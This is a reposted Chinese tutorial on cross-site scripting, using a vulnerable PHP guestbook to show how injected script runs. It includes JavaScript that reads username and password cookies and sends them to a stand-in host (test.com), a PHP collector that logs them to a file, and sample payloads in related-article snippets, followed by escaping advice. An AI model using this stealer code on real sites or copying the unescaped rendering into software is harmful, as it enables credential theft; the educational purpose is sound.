跨站脚本攻击XSS

最新推荐文章于 2024-07-17 17:36:22 发布
最新推荐文章于 2024-07-17 17:36:22 发布
阅读量53 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/dolphinX/p/3391351.html
本文介绍了一种常见的Web安全威胁——跨站脚本攻击(XSS),并详细解释了XSS攻击的工作原理及其潜在的危害。通过一个留言板的例子展示了如何利用XSS漏洞进行攻击,包括窃取用户信息的具体步骤,并提出了相应的预防措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。

一个简单的留言板

我们有个页面用于允许用户发表留言,然后在页面底部显示留言列表

<!DOCTYPE html>
<html>
<head>
    <?php include('/components/headerinclude.php');?></head>
    <style type="text/css">
        .comment-title{
            font-size:14px;
            margin: 6px 0px 2px 4px;
        }

        .comment-body{
            font-size: 14px;
            color:#ccc;
            font-style: italic;
            border-bottom: dashed 1px #ccc;
            margin: 4px;
        }
    </style>
    <script type="text/javascript" src="/js/cookies.js"></script>
<body>
    <form method="post" action="list.php">
        <div style="margin:20px;">
            <div style="font-size:16px;font-weight:bold;">Your Comment</div>
            <div style="padding:6px;">
                Nick Name:
                <br/>
                <input name="name" type="text" style="width:300px;"/>
            </div>
            <div style="padding:6px;">
                Comment:
                <br/>
                <textarea name="comment" style="height:100px; width:300px;"></textarea>
            </div>
            <div style="padding-left:230px;">
                <input type="submit" value="POST" style="padding:4px 0px; width:80px;"/>
            </div>
            <div style="border-bottom:solid 1px #fff;margin-top:10px;">
                <div style="font-size:16px;font-weight:bold;">Comments</div>
            </div>
            <?php 
                require('/components/comments.php'); 
                if(!empty($_POST['name'])){
                    addElement($_POST['name'],$_POST['comment']);
                }
                renderComments();
            ?>
        </div>
    </form>
</body>
</html>

 

addElement()方法用于添加新的留言,而renderComments()方法用于展留言列表,网页看起来是这样的

 

image

XSS

因为我们完全信任了用户输入,但有些别有用心的用户会像这样的输入

image

这样无论是谁访问这个页面的时候控制台都会输出“Hey you are a fool fish!”,如果这只是个恶意的小玩笑,有些人做的事情就不可爱了,有些用户会利用这个漏洞窃取用户信息、诱骗人打开恶意网站或者下载恶意程序等,看个最简单的例子

利用xss窃取用户名密码

 

当然这个示例很简单,几乎攻击不到任何网站,仅仅看看其原理。我们知道很多登陆界面都有记住用户名、密码的功能方便用户下次登录,有些网站是直接用明文记录用户名、密码,恶意用户注册账户登录后使用简单工具查看cookie结构名称后,如果网站有xss漏洞,那么简单的利用jsonp就可以获取其它用户的用户名、密码了。

恶意用户会这么输入

image

我们看看http://test.com/hack.js里藏了什么

var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);

几句简单的javascript,获取cookie中的用户名密码,利用jsonp把向http://test.com/index.php

发送了一个get请求

http://test.com/index.php

<?php
    if(!empty($_GET['password'])){
        $username=$_GET['username'];
        $password=$_GET['password'];
        
        try{
            $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
            $fp=fopen($path,'a');
            flock($fp, LOCK_EX);
            fwrite($fp, "$username\t $password\r\n");
            flock($fp, LOCK_UN);
            fclose($fp);
        }catch(Exception $e){

        }
    }
?>

这样恶意用户就把访问留言板的用户的信息窃取了

怎么预防

上面演示的是一个非常简单的XSS攻击,还有很多隐蔽的方式,但是其核心都是利用了脚本注入,因此我们解决办法其实很简单,不信赖用户输入,对特殊字符如”<”,”>”转义,就可以从根本上防止这一问题,当然很多解决方案都对XSS做了特定限制,如上面这中做法在ASP.NET中不幸不同,微软validateRequest对表单提交自动做了XSS验证。但防不胜防,总有些聪明的恶意用户会到我们的网站搞破坏,对自己站点不放心可以看看这个XSS跨站测试代码大全试试站点是否安全。

转载于:https://www.cnblogs.com/dolphinX/p/3391351.html

跨站脚本攻击(XSS)及防范措施
oscar999的专栏
04-22 4214
á 有两种表示方式: U+00C1 U+0041 U+0301 Unicode标准定义了四种范化形式: D: NFD 典型分解 KD: NFKD 规范分解,规范组成 C: NFC 兼容性分解 KC: NFKC 兼容性分解,规范组成 NF - normalization-type NO_DECOMPOSITION: 不分解, 不对字符串做任何范化 matplotlib ...
WEB安全之防范XSS
weixin_34209406的博客
03-24 91
HTML编码 var HtmlEncode = function(str){ var hex = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'); var preescape = str; var escaped = ""; for(var i = 0; i &lt...
web安全XSS攻击防范
maggie_live的博客
07-07 821
  XSS全称(Cross Site Scripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的,比如获取用户的Cookie,导航到恶意网站,携带木马等。1.XSS是如何发生的呢?1.介绍  xss攻击是跨站脚本攻击,例如在表单中提交含有可执行的JavaScript...
[Asp.Net Core] 网站中的XSS跨站脚本攻击和防范
jevonsflash的专栏
04-14 483
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Web脚本代码(html、javascript、css等),当用户浏览该页面时,嵌入其中的Web脚本代码会被执行,从而达到恶意攻击用户的特殊目的。源代码出自:https://www.cnblogs.com/OleRookie/p/5970167.html。重新访问,成功触发了XSS弹窗。
跨站脚本攻击XSS(Cross Site Script)的原理与常见场景分析
10-18
跨站脚本攻击XSS,Cross Site Scripting)是一种常见的网络安全漏洞,它允许恶意攻击者在用户浏览器中注入并执行恶意脚本。攻击者通常通过在网页上插入恶意HTML或JavaScript代码来实现这一目标。当用户访问这些被...
跨站脚本攻击XSS案例及其解决方案
若华‘的博客
01-03 7405
跨站脚本攻击XSS 目录 案例一:留言板的XSS攻击 利用xss窃取用户名密码 案例二:输入框的XSS攻击 怎么预防 服务端可以干的事 客户端可以干的事 跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 案例一...
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 1180
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
HTTP拆分攻击技术:跨站脚本(XSS)与HTTP拆分攻击的结合.docxHTTP拆分攻击技术:跨站脚本(XSS)与HTTP拆分攻击的结合all.docxHTTP拆分攻击技术:跨站脚本(XSS)与
08-31
HTTP拆分攻击技术:跨站脚本(XSS)与HTTP拆分攻击的结合.docx HTTP拆分攻击技术:跨站脚本(XSS)与HTTP拆分攻击的结合all.docx HTTP拆分攻击技术:跨站脚本(XSS)与HTTP拆分攻击的结合_(10).防御XSS攻击的策略....
XSS 跨站脚本攻击及防范
09-07
XSS(Cross Site Script)跨站脚本攻击。它指的是恶意攻击者往Web 页面里插入恶 意html 代码,当用户浏览该页之时,嵌入其中Web 里面的html 代码会被执行,从而 达到恶意用户的特殊目的。本文介绍了该攻击方式,并给出了一些防范措施。
java 跨站脚本filter 拦截不了表单_跨站脚本:反射式
weixin_32774233的博客
01-13 297
跨站脚本:反射式 (Cross-Site Scripting: Reflected)一、规则中文名称:跨站脚本二、规则英文名称:Cross-Site Scripting三、规则子类中文名称:反射式四、规则子类英文名称:Reflected五、规则概述:攻击者往Web页面里插入恶意脚本代码,当用户浏览该页面时,嵌入其中的脚本代码会被执行,并将结果反馈给用户,从而达到攻击者的特殊目的。六、规则...
XSS跨站脚本攻击的防护措施
alnh4952的博客
05-27 309
先总结一下常见的攻击手法:1. 依赖跨站漏洞,需要在被攻击网站的页面种入脚本的手法1.1. Cookie 盗取,通过javascript 获取被攻击网站种下的cookie,并发送给攻击者。1.1.1. 从cookie 中提取密码等隐私1.1.2. 利用cookie 伪造session,发起重放攻击1.2. Ajex 信息盗取,通过javascript 发起ajex 请求。...
警告:为了安全请不要随意将ASP.Net的validateRequest="false"
热门推荐
DanceFire的专栏
04-11 1万+
ASP.Net 1.1后引入了对提交表单自动检查是否存在XSS跨站脚本攻击)的能力。当用户试图用之类的输入影响页面返回结果的时候,ASP.Net的引擎会引发一个 HttpRequestValidationExceptioin。默认情况下会返回如下文字的页面: Server Error in /YourApplicationPath
跨站脚本攻击详解
weixin_30700977的博客
02-18 805
1 前言 近年来,随着Web2.0的大潮,越来越多的人开始关注Web安全,新的Web攻击手法层出不穷,Web应用程序面临的安全形势日益严峻。 跨站脚本攻击XSS)就是常见的Web攻击技术之一,由于跨站脚本漏洞易于出现且利用成本低,所以被OWASP开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)列为当前的头号Web安...
【转】XSS跨站脚本攻击原理及防护方法
wanggp
11-07 442
摘要 XSS(Cross Site Script)跨站脚本攻击。它指的是恶意攻击者往Web 页面里插入恶意html 代码,当用户浏览该页之时,嵌入其中Web 里面的html 代码会被执行,从而达到恶意用户的特殊目的。本文介绍了该攻击方式,并给出了一些防范措施。 原理 XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、&lt;IMG&gt;、&lt;IFRAME&...
如何防止跨站点脚本攻击
大明的博客
08-21 2243
转自:http://www.freebuf.com/articles/web/15188.html 1. 简介 跨站点脚本(XSS)是当前web应用中最危险和最普遍的漏洞之一。安全研究人员在大部分最受欢迎的网站,包括Google, Facebook, Amazon, PayPal等网站都发现这个漏洞。如果你密切关注bug赏金计划,会发现报道最多的问题属于XSS。为了避免跨站脚本,浏
ASP.NET 下 XSS 跨站脚本攻击的过滤方法
李琦的BLOG
11-08 1万+
做 WEB 开发当然要防止跨站脚本攻击了,尤其是开发BLOG、论坛、购物平台等可以让用户添加自定义内容的网站。 有些开发者选择了将所有Html内容都过滤掉,但是这些不适合有些需要将自定义内容开放给用户的网站,比如淘宝、cnblogs、优快云这样的网站。 在 .net 下也有一些 Xss 过滤工具,但是这些工具都会将HTML过滤的很彻底,比如会将: 文字 过滤成 文字
跨站脚本攻击xss实现
最新发布
12-29
### 跨站脚本攻击XSS)实现方法及原理 #### XSS 攻击概述 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的Web应用程序安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。这些脚本会在受害者的浏览器环境中执行,可能导致敏感信息泄露或其他有害行为的发生[^2]。 #### XSS 的分类 XSS 主要分为三种类型: - **存储型 XSS**:恶意脚本被永久保存在目标服务器上,比如数据库或文件系统中。每当受害者请求含有该脚本的数据时便会触发攻击。 - **反射型 XSS**:通过URL参数、表单输入等方式将恶意代码发送给服务器,再由服务器返回给客户端显示出来,在这个过程中完成攻击过程。 - **DOM 型 XSS**:不同于前两者依赖于服务端响应来传播有效载荷,这类攻击完全发生在客户端侧,即JavaScript直接操作文档对象模型 (Document Object Model),当某些特定条件满足时便能激活预埋下的危险指令[^3]。 #### 实现机制 为了成功实施一次典型的XSS攻击,通常需要以下几个要素协同工作: 1. 找到一个可以接受用户输入的地方; 2. 输入未经过适当验证和清理的内容; 3. 将此未经处理过的数据反馈回HTML页面内展示给最终使用者看到; 一旦上述情况发生,则意味着存在潜在风险点可用于发起进一步行动——例如插入一段`<script>`标签包裹着任意可被执行javascript语句作为payload传入受影响区域等待时机成熟后自动运行起来影响更多无辜浏览者[^4]。 ```html <!-- 反射型XSS示例 --> <a href="http://example.com/search?q=<script>alert('XSS')</script>">点击这里</a> <!-- 存储型XSS示例 --> <textarea name="comment"> <script> alert(document.cookie); </script> </textarea> <!-- DOM型XSS示例 --> <input type="text" id="searchBox"/> <script> document.getElementById("searchBox").value = location.hash.slice(1); // 如果hash包含恶意代码则会立即执行 </script> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值